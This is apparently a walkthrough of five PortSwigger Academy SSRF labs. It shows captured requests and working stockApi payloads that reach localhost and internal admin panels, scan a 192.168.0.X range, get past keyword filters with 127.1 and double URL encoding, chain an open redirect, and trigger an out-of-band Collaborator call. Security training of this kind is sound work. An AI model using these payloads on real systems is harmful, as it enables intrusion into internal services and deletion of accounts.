Server-side request forgery (SSRF) attacks

Lab: Basic SSRF against the local server

This lab has a stock check feature which fetches data from an internal system.

To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos.

Solution

First, we will go into View Details

We should see this page.

When we click on check stock, it will return us with the actual amount

If we take a look at the request, it will look something like this

POST /product/stock HTTP/2
Host: 0a5d00bf0429be608053e4a0004200d2.web-security-academy.net
Cookie: session=6Hh1vXbwctGkKZoDqELoaSBCPdmEqvLM
Content-Length: 107
Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126"
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://0a5d00bf0429be608053e4a0004200d2.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a5d00bf0429be608053e4a0004200d2.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

stockApi=http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1

So we can modify the stockApi to this and send using Repeater

...
stockApi=http%3A%2F%2Flocalhost%2Fadmin

After we send the request, we are able to see the admin page

HTTP/2 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Set-Cookie: session=MhpPdNhCMekRvrvBe9b61ier8NhfTirn; Secure; HttpOnly; SameSite=None
X-Frame-Options: SAMEORIGIN
Content-Length: 3070

<!DOCTYPE html>
<html>
    <head>
        <link href=/resources/labheader/css/academyLabHeader.css rel=stylesheet>
        <link href=/resources/css/labs.css rel=stylesheet>
        <title>Basic SSRF against the local server</title>
    </head>
    <body>
        <script src="/resources/labheader/js/labHeader.js"></script>
        <div id="academyLabHeader">
            <section class='academyLabBanner'>
                <div class=container>
                    <div class=logo></div>
                        <div class=title-container>
                            <h2>Basic SSRF against the local server</h2>
                            <a class=link-back href='https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost'>
                                Back&nbsp;to&nbsp;lab&nbsp;description&nbsp;
                                <svg version=1.1 id=Layer_1 xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' x=0px y=0px viewBox='0 0 28 30' enable-background='new 0 0 28 30' xml:space=preserve title=back-arrow>
                                    <g>
                                        <polygon points='1.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15'></polygon>
                                        <polygon points='14.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15'></polygon>
                                    </g>
                                </svg>
                            </a>
                        </div>
                        <div class='widgetcontainer-lab-status is-notsolved'>
                            <span>LAB</span>
                            <p>Not solved</p>
                            <span class=lab-status-icon></span>
                        </div>
                    </div>
                </div>
            </section>
        </div>
        <div theme="">
            <section class="maincontainer">
                <div class="container is-page">
                    <header class="navigation-header">
                        <section class="top-links">
                            <a href=/>Home</a><p>|</p>
                            <a href="/admin">Admin panel</a><p>|</p>
                            <a href="/my-account">My account</a><p>|</p>
                        </section>
                    </header>
                    <header class="notification-header">
                    </header>
                    <section>
                        <h1>Users</h1>
                        <div>
                            <span>wiener - </span>
                            <a href="/admin/delete?username=wiener">Delete</a>
                        </div>
                        <div>
                            <span>carlos - </span>
                            <a href="/admin/delete?username=carlos">Delete</a>
                        </div>
                    </section>
                    <br>
                    <hr>
                </div>
            </section>
            <div class="footer-wrapper">
            </div>
        </div>
    </body>
</html>

From there we can see that there is link that we can use to delete carlos. We just need to modify stockApi to this:

...
stockApi=http%3A%2F%2Flocalhost%2Fadmin%2Fdelete%3Fusername%3Dcarlos

After sending this request, we will have delete the user carlos.

Lab: Basic SSRF against another back-end system

This lab has a stock check feature which fetches data from an internal system.

To solve the lab, use the stock check functionality to scan the internal 192.168.0.X range for an admin interface on port 8080, then use it to delete the user carlos.

Solution

Same as the previous lab, we will capture the request for stock number using Burp Suite

We will send it to both Repeater and Intruder.

In Intruder, we will modify the request and set the payload position as shown below

Under the payload, we will use a list of number from 1 to 254

After reviewing the result, we can see that .16 returns 200.

Same as the previous lab, we will modify stockApi to this value in Repeater and send the request

...
stockApi=http%3A%2F%2F192.168.0.16%3A8080%2Fadmin%2Fdelete%3Fusername%3Dcarlos
...

It should delete the user carlos.

Lab: SSRF with blacklist-based input filter

This lab has a stock check feature which fetches data from an internal system.

To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos.

The developer has deployed two weak anti-SSRF defenses that you will need to bypass.

Solution

Same as before, we will capture the request that will the return the stock number using Burp Suite and send to Repeater

If we modify the stockApi to follow this

...
stockApi=http%3A%2F%2Flocalhost%2Fadmin

It will return us this

HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 51

"External stock check blocked for security reasons"

We can try to change the stockApi to follow this

...
stockApi=http%3A%2F%2F127.1%2Fadmin

It will still returns us the same message, so we will try to bypass potential defence.

We will test is it they blocked the keyword admin

...
stockApi=http%3A%2F%2F127.1%2Fdmin

This time they returned a different result.

HTTP/2 404 Not Found
Content-Type: application/json; charset=utf-8
Set-Cookie: session=0KtFeAnK2TVVC2GRI9p0FxSiyUIFrxdR; Secure; HttpOnly; SameSite=None
X-Frame-Options: SAMEORIGIN
Content-Length: 11

"Not Found"

This means they blocked the word.

So the next thing we can do is to URL encode the word and put into the request

...
stockApi=http%3A%2F%2F127.1%2F%61%64%6d%69%6e

It still return us with the same message.

Maybe we can try to double encode it instead.

...
stockApi=http%3A%2F%2F127.1%2F%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65

Finally we are able to see the admin web page.

So to delete the user, we can just do this:

...
stockApi=http%3A%2F%2F127.1%2F%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65%2Fdelete%3Fusername%3Dcarlos

After sending the request, we should be able to delete the user carlos

Lab: SSRF with filter bypass via open redirection vulnerability

This lab has a stock check feature which fetches data from an internal system.

To solve the lab, change the stock check URL to access the admin interface at http://192.168.0.12:8080/admin and delete the user carlos.

The stock checker has been restricted to only access the local application, so you will need to find an open redirect affecting the application first.

Solution

First, we need to find request that have open redirection.

When we click on Next product, we can see that there is a request which have open redirection

When we inspect the request, we can see that the request is redirecting to /product?productId=2

GET /product/nextProduct?currentProductId=1&path=/product?productId=2 HTTP/2
...

So the next step is send the request to get the stock number to Repeater and modify StockApi to be like this:

...
stockApi=%2Fproduct%2FnextProduct%3FcurrentProductId%3D1%26path%3Dhttp%3A%2F%2F192.168.0.12%3A8080%2Fadmin

After sending the request, we should be able to see the admin page

The final step is to modify stockApi to delete carlos

...
stockApi=%2Fproduct%2FnextProduct%3FcurrentProductId%3D1%26path%3Dhttp%3A%2F%2F192.168.0.12%3A8080%2Fadmin%2Fdelete%3Fusername%3Dcarlos

After we send the request, we should be able to see that carlos is deleted.

Lab: Blind SSRF with out-of-band detection

This site uses analytics software which fetches the URL specified in the Referer header when a product page is loaded.

To solve the lab, use this functionality to cause an HTTP request to the public Burp Collaborator server.

Solution

Same as the previous lab, we will capture the request when we view the product information.

When we view the request it will look something like this:

GET /product?productId=1 HTTP/2
Host: 0a9e00c904faead082b6b133008c0077.web-security-academy.net
Cookie: session=P4gCpIDVj7VIB6sv4vAuscBpXOnAMNwo
Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a9e00c904faead082b6b133008c0077.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

Next, we will highlight the value of Referer and click on Insert Collaborator payload.

When we send the request over, we should be able to see it in Collaborator